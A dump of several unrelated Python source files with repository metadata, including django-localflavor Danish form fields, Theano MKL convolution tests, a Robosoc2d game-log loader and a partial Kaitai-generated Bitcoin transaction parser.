name = "{} ({})".format(longname, shortname)
clean_message = "The value for {} cannot be empty"
clean_message = clean_message.format(name)
else:
clean_message = message
return clean_message
def format_date(date_input):
"""
Convert a Python date object into an FGDC string format YYYYMMDD
Parameters
----------
date_input : str or datetime
if str provided must be in format that dateutil's parser can handle
Returns
-------
    str : date formatted in FGDC YYYYMMDD format
"""
if type(date_input) == str:
date_input = parser.parse(date_input)
return date_input.strftime("%Y%m%d")
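
A minimal usage sketch for the two public helpers above; 'record.xml' is a placeholder path, not a file shipped with pymdwizard:

# Hypothetical call: validate a record against the BDP schema and format a date.
errors = validate_xml('record.xml', xsl_fname='bdp', as_dataframe=True)
if len(errors):
    print(errors[['xpath', 'message']])
print(format_date('May 1, 2017'))  # '20170501'
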
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
fa35d2742f0af2fece6c31ef5a0689b9bda6cc31
| 898
|
py
|
Python
|
localflavor/dk/forms.py
|
int2k/django-localflavor
|
fcda7f3aa3685f15f031b7d9b78f02e19ac5fb0b
|
[
"BSD-3-Clause"
] | 1
|
2020-07-12T23:24:38.000Z
|
2020-07-12T23:24:38.000Z
|
localflavor/dk/forms.py
|
KonstantinKlepikov/django-localflavor
|
87133f6cea1799e0b5e073dbc727dc88746f8fa8
|
[
"BSD-3-Clause"
] | null | null | null |
localflavor/dk/forms.py
|
KonstantinKlepikov/django-localflavor
|
87133f6cea1799e0b5e073dbc727dc88746f8fa8
|
[
"BSD-3-Clause"
] | 1
|
2020-01-17T16:26:54.000Z
|
2020-01-17T16:26:54.000Z
|
"""Denmark specific Form helpers."""
| 33.259259
| 94
| 0.759465
|
"""Denmark specific Form helpers."""
from django.core.exceptions import ValidationError
from django.forms import fields, widgets
from django.utils.translation import gettext_lazy as _
from .dk_municipalities import DK_MUNICIPALITIES
from .dk_postalcodes import DK_POSTALCODES
def postal_code_validator(value):
if value not in [entry[0] for entry in DK_POSTALCODES]:
raise ValidationError(_('Enter a postal code in the format XXXX.'))
class DKPostalCodeField(fields.CharField):
"""An Input widget that uses a list of Danish postal codes as valid input."""
default_validators = [postal_code_validator]
class DKMunicipalitySelect(widgets.Select):
"""A Select widget that uses a list of Danish municipalities (kommuner) as its choices."""
def __init__(self, attrs=None, *args, **kwargs):
super().__init__(attrs, choices=DK_MUNICIPALITIES, *args, **kwargs)
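
A hypothetical Django form wiring the field and widget above together (the form and field names are made up, not part of django-localflavor):

from django import forms

# Illustrative only: combines DKPostalCodeField with the municipality Select widget.
class DKAddressForm(forms.Form):
    postal_code = DKPostalCodeField()
    municipality = forms.CharField(widget=DKMunicipalitySelect())
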
| 0
| 0
| 0
| 400
| 0
| 148
| 0
| 129
| 181
|
b8de9676b1c3db948ce6ca35eb77076d04fa3617
| 3,445
|
py
|
Python
|
test/unit/test_browser.py
|
sanAkdam/chime
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 8
|
2015-02-05T22:12:41.000Z
|
2015-05-15T16:15:14.000Z
|
test/unit/test_browser.py
|
sanAkdam/chime
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 168
|
2015-02-02T23:02:52.000Z
|
2015-05-15T21:54:07.000Z
|
test/unit/test_browser.py
|
codeforamerica/bizarro-cms
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 5
|
2016-11-20T15:51:32.000Z
|
2021-04-16T09:44:08.000Z
|
import unittest
if __name__ == '__main__':
unittest.main()
| 37.043011
| 116
| 0.613933
|
import unittest
from unittest import TestCase
from acceptance.browser import Browser
class TestBrowser(TestCase):
def test_creation(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual('Windows', browser.os)
self.assertEqual('7', browser.os_version)
self.assertEqual('IE', browser.browser)
self.assertEqual('8.0', browser.browser_version)
def test_as_selenium_capabilities(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0'},
browser.as_browserstack_capabilities())
def test_as_browserstack_capabilities_with_extra_info(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0'},
browser.as_browserstack_capabilities())
def test_as_saucelabs_capabilities(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'platform': 'Windows 7',
'browserName': 'internet explorer', 'version': '8.0', 'foo': 'bar'},
browser.as_saucelabs_capabilities({'foo': 'bar'}))
def test_doesnt_mutate_extra_info(self):
browser = Browser('Windows', '7', "IE", '8.0')
other_info = {'foo': 'bar'}
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0', 'foo': 'bar'},
browser.as_browserstack_capabilities(other_info))
self.assertEqual(1, len(other_info.keys()))
def test_from_string_basic(self):
browsers = Browser.from_string("all")
self.assertEqual(9, len(browsers))
browsers = Browser.from_string(None)
self.assertEqual(None, browsers)
browsers = Browser.from_string("")
self.assertEqual(None, browsers)
def test_from_string_unknown(self):
with self.assertRaises(ValueError):
Browser.from_string("arglebargle")
def test_from_string_supported(self):
browsers = Browser.from_string("supported")
self.assertEqual(8, len(browsers))
self.assertFalse(Browser('Windows', '8.1', "IE", '11.0') in browsers)
def test_from_string_with_browser(self):
browsers = Browser.from_string("ie8")
self.assertEqual([Browser('Windows', '7', "IE", '8.0')], browsers)
browsers = Browser.from_string("ie11")
self.assertEqual([Browser('Windows', '8.1', "IE", '11.0'), Browser('Windows', '7', "IE", '11.0')], browsers)
def test_from_string_with_os(self):
browsers = Browser.from_string("win8.1")
for browser in browsers:
self.assertEqual('Windows', browser.os)
self.assertEqual('8.1', browser.os_version)
def test_from_string_with_os_and_browser(self):
browsers = Browser.from_string("win8.1/ie11")
self.assertEqual([Browser('Windows', '8.1', "IE", '11.0')], browsers)
def test_safe_name(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual("windows_7_ie_8_0", browser.safe_name())
def test_as_string(self):
browser = Browser('Windows', '7', 'IE', '8.0')
self.assertEqual('Windows 7 IE 8.0', str(browser))
if __name__ == '__main__':
unittest.main()
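
The spec strings accepted by Browser.from_string, as exercised above, range from "all"/"supported" down to os/browser pairs; an illustrative loop (the counts follow the assertions above and depend on acceptance.browser's supported matrix):

# Illustration only; relies on the same browser matrix the tests use.
for spec in ("supported", "ie8", "win8.1/ie11"):
    print(spec, len(Browser.from_string(spec)))  # 8, 1, 1 per the tests above
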
| 0
| 0
| 0
| 3,286
| 0
| 0
| 0
| 25
| 68
|
23198638402b93bfa4324851435640a23d8cb61f
| 4,889
|
py
|
Python
|
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
# (c) 2021 Ruggero Rossi
# Load a Robosoc2d game state log
# supported version: 1.0.0
| 36.214815
| 77
| 0.55676
|
# (c) 2021 Ruggero Rossi
# Load a Robosoc2d game state log
# supported version: 1.0.0
def load_state_log(file_name):
history = None
with open(file_name, 'r') as f:
game={}
version=f.readline()
if len(version)==0 :
return None
game['ver']=version
game['team1_name']=f.readline().strip()
if len(game['team1_name']) == 0:
game['team1_name'] = "Team A"
game['team2_name']=f.readline().strip()
if len(game['team2_name']) == 0:
game['team2_name'] = "Team B"
players=f.readline()
if len(players)==0 :
return None
players= players.split(',')
if len(players)<2:
return None
game['n_players']=[]
if players[0].isdigit():
game['n_players'].append(int(players[0]))
else:
return None
players[1]=players[1].strip('\n')
if players[1].isdigit():
game['n_players'].append(int(players[1]))
else:
return None
settings=f.readline()
if len(settings)==0 :
return None
settings=settings.split(',')
if len(settings) < 34 :
return None
sett={}
sett['ticks_per_time']=int(settings[0])
sett['pitch_length']=float(settings[1])
sett['pitch_width']=float(settings[2])
sett['goal_width']=float(settings[3])
sett['center_radius']=float(settings[4])
sett['pole_radius']=float(settings[5])
sett['ball_radius']=float(settings[6])
sett['player_radius']=float(settings[7])
sett['catch_radius']=float(settings[8])
sett['catch_holding_ticks']=int(settings[9])
sett['kick_radius']=float(settings[10])
sett['kickable_distance']=float(settings[11])
sett['catchable_distance']=float(settings[12])
sett['kickable_angle']=float(settings[13])
sett['kickable_direction_angle']=float(settings[14])
sett['catchable_angle']=float(settings[15])
sett['net_length']=float(settings[16])
sett['catchable_area_length']=float(settings[17])
sett['catchable_area_width']=float(settings[18])
sett['corner_min_distance']=float(settings[19])
sett['throwin_min_distance']=float(settings[20])
sett['out_pitch_limit']=float(settings[21])
sett['max_dash_power']=float(settings[22])
sett['max_kick_power']=float(settings[23])
sett['player_velocity_decay']=float(settings[24])
sett['ball_velocity_decay']=float(settings[25])
sett['max_player_speed']=float(settings[26])
sett['max_ball_speed']=float(settings[27])
sett['catch_probability']=float(settings[28])
sett['player_random_noise']=float(settings[29])
sett['player_direction_noise']=float(settings[30])
sett['player_velocity_direction_mix']=float(settings[31])
sett['ball_inside_player_velocity_displace']=float(settings[32])
sett['after_catch_distance']=float(settings[33].strip('\n'))
game['sett']=sett
ticks=[]
min_line_len=offset=8+game['n_players'][0]*5+game['n_players'][1]*5+4
default_empty=[0]*min_line_len
prev_tick=default_empty
for tick in f:
tick=tick.split(',')
if len(tick) < min_line_len:
print("* error: missing data at tick: "+str(len(ticks)))
tick=prev_tick
t={}
t['score1']=int(tick[1])
t['score2']=int(tick[2])
t['state']=int(tick[3])
t['ball_x']=float(tick[4])
t['ball_y']=float(tick[5])
t['ball_velocity_x']=float(tick[6])
t['ball_velocity_y']=float(tick[7])
t['teams']=[[],[]]
offset=game['n_players'][0]*5
for which_team in range(2):
for i in range(game['n_players'][which_team]):
p={}
p['x']=float(tick[i*5+8+offset*which_team])
p['y']=float(tick[i*5+9+offset*which_team])
p['velocity_x']=float(tick[i*5+10+offset*which_team])
p['velocity_y']=float(tick[i*5+11+offset*which_team])
p['direction']=float(tick[i*5+12+offset*which_team])
t['teams'][which_team].append(p)
offset=(game['n_players'][0]+game['n_players'][1])*5
t['last_touched_team2']=bool(int(tick[8+offset]))
t['starting_team_max_range']=float(tick[9+offset])
t['ball_catched']=int(tick[10+offset])
t['ball_catched_team2']=bool(int(tick[11+offset].strip('\n')))
ticks.append(t)
prev_tick=tick
game['ticks']=ticks
history=game
return history
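
A small usage sketch for the loader above; 'match.state.log' is a placeholder file name:

# Hypothetical call: summarise a loaded state log.
game = load_state_log('match.state.log')
if game is not None:
    print(game['team1_name'], 'vs', game['team2_name'], '-', len(game['ticks']), 'ticks')
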
| 0
| 0
| 0
| 0
| 0
| 4,781
| 0
| 0
| 23
|
6d78cbb20f53042b0737e27a57734137bf0a0e4c
| 8,198
|
py
|
Python
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 64
|
2016-10-02T20:41:56.000Z
|
2020-03-11T14:59:40.000Z
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 4
|
2017-06-12T05:12:38.000Z
|
2018-03-15T03:16:30.000Z
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 30
|
2016-10-27T21:59:00.000Z
|
2021-02-20T09:55:14.000Z
|
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano.sandbox import mkl
numpy.random.seed(123)
if not mkl.mkl_available:
raise SkipTest('Optional package MKL disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
if __name__ == '__main__':
unittest.main()
| 44.797814
| 123
| 0.639302
|
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano import tensor as T
from theano.tensor.nnet import conv2d
from theano.sandbox import mkl
from theano.sandbox.mkl.basic_ops import U2IConv, I2U
from theano.sandbox.mkl.mkl_conv import Conv2D
numpy.random.seed(123)
if not mkl.mkl_available:
raise SkipTest('Optional package MKL disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
class test_mkl_conv_forward(unittest.TestCase):
def test_conv_U2I(self):
images = T.dtensor4('inputs')
a_internal = U2IConv(imshp=(12, 3, 256, 256),
kshp=(12, 3, 3, 3))(images)
out = I2U()(a_internal)
fopt = theano.function([images], out, mode=mode_with_mkl)
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
assert numpy.allclose(fopt(ival), ival)
def test_conv_no_bias(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
images_internal = U2IConv(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3))(images)
convOut_internal = Conv2D(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3), filter_flip=False)(images_internal, weights)
convOut_user = I2U()(convOut_internal)
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
wval = numpy.random.rand(12, 3, 3, 3).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights], outputs=convOut_user, mode=mode_with_mkl)
new_out = fopt(ival, wval)
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
old_out = fori(ival, wval)
assert str(fopt.maker.fgraph.toposort()) != str(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out, new_out)
def test_conv_with_bias(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
bias = T.dvector('bias')
ishape = [(8, 3, 256, 256), (16, 3, 256, 256), (32, 3, 256, 256), (64, 3, 256, 256)]
wshape = [(8, 3, 3, 3), (16, 3, 3, 3), (32, 3, 3, 3), (64, 3, 3, 3)]
for i, ish in enumerate(ishape):
wsh = wshape[i]
images_internal = U2IConv(imshp=ish, kshp=wsh)(images)
convOutBias_internal = Conv2D(imshp=ish, kshp=wsh, filter_flip=False)(images_internal, weights, bias)
convOutBias_user = I2U()(convOutBias_internal)
ival = numpy.random.rand(*ish).astype(numpy.float64)
wval = numpy.random.rand(*wsh).astype(numpy.float64)
bval = numpy.random.rand(wsh[0]).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBias_user, mode=mode_with_mkl)
new_old = fopt(ival, wval, bval)
convOut = conv2d(images, weights, input_shape=ish, filter_shape=wsh, filter_flip=False)
convOutBias = convOut + bias.dimshuffle('x', 0, 'x', 'x')
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBias, mode=mode_without_mkl)
old_out = fori(ival, wval, bval)
assert str(fopt.maker.fgraph.toposort()) != str(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out, new_old)
def test_no_shape(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
convOut = conv2d(images, weights, filter_shape=(12, 3, 3, 3), filter_flip=False)
fopt = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_with_mkl)
fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
# No optimization for the case image shape is None
assert all([not isinstance(n, (Conv2D, U2IConv, I2U)) for n in fopt.maker.fgraph.toposort()])
assert str(fopt.maker.fgraph.toposort()) == str(fori.maker.fgraph.toposort())
class test_mkl_conv_backward(unittest.TestCase):
def test_conv_no_bias(self):
images = T.dtensor4('input_conv')
weights = T.dtensor4('weights')
images_internal = U2IConv(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3))(images)
convOut = Conv2D(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3), filter_flip=False)(images_internal, weights)
convOut_user = I2U()(convOut)
convOutLoss = T.mean(convOut_user)
conv_op_di = T.grad(convOutLoss, images)
conv_op_dk = T.grad(convOutLoss, weights)
convOutBack = [conv_op_di, conv_op_dk]
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
wval = numpy.random.rand(12, 3, 3, 3).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_with_mkl)
new_out = fopt(ival, wval)
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
convOutLoss = T.mean(convOut)
conv_op_di = T.grad(convOutLoss, images)
conv_op_dk = T.grad(convOutLoss, weights)
convOutBack = [conv_op_di, conv_op_dk]
fori = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_without_mkl)
old_out = fori(ival, wval)
assert len(fopt.maker.fgraph.toposort()) != len(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out[0], new_out[0])
assert new_out[0].dtype == 'float64'
# weightsGrad Layout is different.
# assert numpy.allclose(old_out[1], new_out[1])
def test_conv_with_bias(self):
images = T.dtensor4('input_conv')
weights = T.dtensor4('weights')
bias = T.dvector('bias')
ishape = [(8, 3, 256, 256), (16, 3, 256, 256), (32, 3, 256, 256), (64, 3, 256, 256)]
wshape = [(8, 3, 3, 3), (16, 3, 3, 3), (32, 3, 3, 3), (64, 3, 3, 3)]
for i, ish in enumerate(ishape):
wsh = wshape[i]
images_internal = U2IConv(imshp=ish, kshp=wsh)(images)
convOut = Conv2D(imshp=ish, kshp=wsh, filter_flip=False)(images_internal, weights, bias)
convOut_user = I2U()(convOut)
convOutLoss = T.mean(convOut_user)
conv_op_di = theano.grad(convOutLoss, images)
conv_op_dk = theano.grad(convOutLoss, weights)
conv_op_db = theano.grad(convOutLoss, bias)
convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
ival = numpy.random.rand(*ish).astype(numpy.float64)
wval = numpy.random.rand(*wsh).astype(numpy.float64)
bval = numpy.random.rand(wsh[0]).astype(numpy.float64) - numpy.random.rand(wsh[0]).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_with_mkl)
new_out = fopt(ival, wval, bval)
convOut = conv2d(images, weights, input_shape=ish, filter_shape=wsh, filter_flip=False)
convOutLoss = T.mean(convOut + bias.dimshuffle('x', 0, 'x', 'x'))
conv_op_di = theano.grad(convOutLoss, images)
conv_op_dk = theano.grad(convOutLoss, weights)
conv_op_db = theano.grad(convOutLoss, bias)
convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_without_mkl)
old_out = fori(ival, wval, bval)
assert len(fopt.maker.fgraph.toposort()) != len(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out[0], new_out[0])
# assert numpy.allclose(old_out[1], new_out[1])
assert numpy.allclose(old_out[2], new_out[2])
assert new_out[0].dtype == 'float64'
assert new_out[2].dtype == 'float64'
if __name__ == '__main__':
unittest.main()
| 0
| 0
| 0
| 7,353
| 0
| 0
| 0
| 82
| 134
|
0a99668876349e7b2f9a56a2f17351b4ba01af2a
| 3,837
|
py
|
Python
|
tests/python_tests.py
|
reasoned-ai/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | 8
|
2019-07-22T08:57:20.000Z
|
2021-03-26T13:51:02.000Z
|
tests/python_tests.py
|
xumiao/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | null | null | null |
tests/python_tests.py
|
xumiao/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | 1
|
2019-11-16T13:37:35.000Z
|
2019-11-16T13:37:35.000Z
|
"""Unit tests for embedding Python code"""
| 30.696
| 70
| 0.484754
|
"""Unit tests for embedding Python code"""
import datetime
from pandas import DataFrame
from tests.utils import NormTestCase
class PythonTestCase(NormTestCase):
def test_python_declaration(self):
script = """
test := {{
from datetime import datetime
test = datetime.utcnow
}};
"""
self.execute(script)
lam = self.execute("test;")
self.assertTrue(lam is not None)
def test_python_query(self):
script = """
test := {{
from datetime import datetime
test = datetime.utcnow
}};
"""
self.execute(script)
result = self.execute("test();")
self.assertTrue(result is not None)
self.assertTrue(isinstance(result, datetime.datetime))
def test_python_query_on_data(self):
script = """
test := {{
import numpy as np
test = np.sin
}};
"""
self.execute(script)
script = """
a := (1, 2, 3)
| (1.1, 2.2, 3.3)
| (0.1, 0.2, 0.3)
;
"""
self.execute(script)
result = self.execute("test(a());")
self.assertTrue(result is not None)
def test_python_custom_function(self):
script = """
test := {{
def test(x):
return '{}-{}'.format(x.b, x.c)
}};
"""
self.execute(script)
script = """
a(b:String, c:String) := ("store", "truth")
| ("having", "evil")
;
"""
self.execute(script)
result = self.execute("test(a());")
self.assertTrue(result is not None)
self.assertTrue(isinstance(result, DataFrame))
def test_python_function_projection(self):
script = """
utcnow := {{
from datetime import datetime
utcnow = datetime.utcnow
}};
"""
self.execute(script)
script = """
a(b:String, c:String) := ("store", "truth")
| ("having", "evil")
;
"""
self.execute(script)
lam = self.execute("a &= utcnow()?time;")
self.assertTrue(lam is not None)
self.assertTrue(isinstance(lam.data, DataFrame))
self.assertTrue(lam.data['time'] is not None)
def test_python_function_projection2(self):
script = """
gaussian := {{
import numpy as np
def gaussian(v):
return np.exp(-v*v / 2)/np.sqrt(2*np.pi)
}};
"""
self.execute(script)
script = """
a(v: Float, mu: Float) := (1.2, 2.3)
| (1.0, 2.0)
;
"""
self.execute(script)
lam = self.execute("a &= gaussian(v)?p;")
self.assertTrue(lam is not None)
self.assertTrue(isinstance(lam.data, DataFrame))
self.assertTrue(lam.data['p'] is not None)
def test_python_code_expression(self):
self.execute("test(a: String, b: Integer);")
import pandas as pd
t1 = pd.DataFrame(data={'a': ['a', 'b', 'c'], 'b': [1, 2, 3]})
self.executor.python_context = locals()
lam = self.execute("test(a: String, b: Integer) := {{ t1 }};")
self.assertTrue(lam is not None)
self.assertTrue(all(lam.data['a'] == ['a', 'b', 'c']))
self.assertTrue(all(lam.data['b'] == [1, 2, 3]))
t2 = t1
t2.loc[1, 'a'] = 'e'
self.executor.python_context = locals()
lam = self.execute("test := {{ t2 }};")
self.assertTrue(lam is not None)
self.assertTrue(all(lam.data['a'] == ['a', 'e', 'c']))
self.assertTrue(all(lam.data['b'] == [1, 2, 3]))
| 0
| 0
| 0
| 3,686
| 0
| 0
| 0
| 16
| 91
|
0a67f4076fdfe5bc717c7292a9258ff71ce35595
| 10,696
|
py
|
Python
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 304
|
2020-02-07T21:05:22.000Z
|
2022-03-24T05:30:37.000Z
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 2,107
|
2019-11-05T09:26:16.000Z
|
2022-02-14T13:35:36.000Z
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 30
|
2020-03-11T14:36:43.000Z
|
2022-03-07T04:45:17.000Z
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
| 50.691943
| 164
| 0.553291
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
from enum import Enum
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class BitcoinTransaction(KaitaiStruct):
"""
.. seealso::
Source - https://bitcoin.org/en/developer-guide#transactions
https://en.bitcoin.it/wiki/Transaction
"""
SEQ_FIELDS = ["version", "num_vins", "vins", "num_vouts", "vouts", "locktime"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['version']['start'] = self._io.pos()
self.version = self._io.read_u4le()
self._debug['version']['end'] = self._io.pos()
self._debug['num_vins']['start'] = self._io.pos()
self.num_vins = self._io.read_u1()
self._debug['num_vins']['end'] = self._io.pos()
self._debug['vins']['start'] = self._io.pos()
self.vins = [None] * (self.num_vins)
for i in range(self.num_vins):
if not 'arr' in self._debug['vins']:
self._debug['vins']['arr'] = []
self._debug['vins']['arr'].append({'start': self._io.pos()})
_t_vins = BitcoinTransaction.Vin(self._io, self, self._root)
_t_vins._read()
self.vins[i] = _t_vins
self._debug['vins']['arr'][i]['end'] = self._io.pos()
self._debug['vins']['end'] = self._io.pos()
self._debug['num_vouts']['start'] = self._io.pos()
self.num_vouts = self._io.read_u1()
self._debug['num_vouts']['end'] = self._io.pos()
self._debug['vouts']['start'] = self._io.pos()
self.vouts = [None] * (self.num_vouts)
for i in range(self.num_vouts):
if not 'arr' in self._debug['vouts']:
self._debug['vouts']['arr'] = []
self._debug['vouts']['arr'].append({'start': self._io.pos()})
_t_vouts = BitcoinTransaction.Vout(self._io, self, self._root)
_t_vouts._read()
self.vouts[i] = _t_vouts
self._debug['vouts']['arr'][i]['end'] = self._io.pos()
self._debug['vouts']['end'] = self._io.pos()
self._debug['locktime']['start'] = self._io.pos()
self.locktime = self._io.read_u4le()
self._debug['locktime']['end'] = self._io.pos()
class Vin(KaitaiStruct):
SEQ_FIELDS = ["txid", "output_id", "len_script", "script_sig", "end_of_vin"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['txid']['start'] = self._io.pos()
self.txid = self._io.read_bytes(32)
self._debug['txid']['end'] = self._io.pos()
self._debug['output_id']['start'] = self._io.pos()
self.output_id = self._io.read_u4le()
self._debug['output_id']['end'] = self._io.pos()
self._debug['len_script']['start'] = self._io.pos()
self.len_script = self._io.read_u1()
self._debug['len_script']['end'] = self._io.pos()
self._debug['script_sig']['start'] = self._io.pos()
self._raw_script_sig = self._io.read_bytes(self.len_script)
_io__raw_script_sig = KaitaiStream(BytesIO(self._raw_script_sig))
self.script_sig = BitcoinTransaction.Vin.ScriptSignature(_io__raw_script_sig, self, self._root)
self.script_sig._read()
self._debug['script_sig']['end'] = self._io.pos()
self._debug['end_of_vin']['start'] = self._io.pos()
self.end_of_vin = self._io.read_bytes(4)
self._debug['end_of_vin']['end'] = self._io.pos()
if not self.end_of_vin == b"\xFF\xFF\xFF\xFF":
raise kaitaistruct.ValidationNotEqualError(b"\xFF\xFF\xFF\xFF", self.end_of_vin, self._io, u"/types/vin/seq/4")
class ScriptSignature(KaitaiStruct):
class SighashType(Enum):
sighash_all = 1
sighash_none = 2
sighash_single = 3
sighash_anyonecanpay = 80
SEQ_FIELDS = ["len_sig_stack", "der_sig", "sig_type", "len_pubkey_stack", "pubkey"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['len_sig_stack']['start'] = self._io.pos()
self.len_sig_stack = self._io.read_u1()
self._debug['len_sig_stack']['end'] = self._io.pos()
self._debug['der_sig']['start'] = self._io.pos()
self.der_sig = BitcoinTransaction.Vin.ScriptSignature.DerSignature(self._io, self, self._root)
self.der_sig._read()
self._debug['der_sig']['end'] = self._io.pos()
self._debug['sig_type']['start'] = self._io.pos()
self.sig_type = KaitaiStream.resolve_enum(BitcoinTransaction.Vin.ScriptSignature.SighashType, self._io.read_u1())
self._debug['sig_type']['end'] = self._io.pos()
self._debug['len_pubkey_stack']['start'] = self._io.pos()
self.len_pubkey_stack = self._io.read_u1()
self._debug['len_pubkey_stack']['end'] = self._io.pos()
self._debug['pubkey']['start'] = self._io.pos()
self.pubkey = BitcoinTransaction.Vin.ScriptSignature.PublicKey(self._io, self, self._root)
self.pubkey._read()
self._debug['pubkey']['end'] = self._io.pos()
class DerSignature(KaitaiStruct):
SEQ_FIELDS = ["sequence", "len_sig", "sep_1", "len_sig_r", "sig_r", "sep_2", "len_sig_s", "sig_s"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['sequence']['start'] = self._io.pos()
self.sequence = self._io.read_bytes(1)
self._debug['sequence']['end'] = self._io.pos()
if not self.sequence == b"\x30":
raise kaitaistruct.ValidationNotEqualError(b"\x30", self.sequence, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/0")
self._debug['len_sig']['start'] = self._io.pos()
self.len_sig = self._io.read_u1()
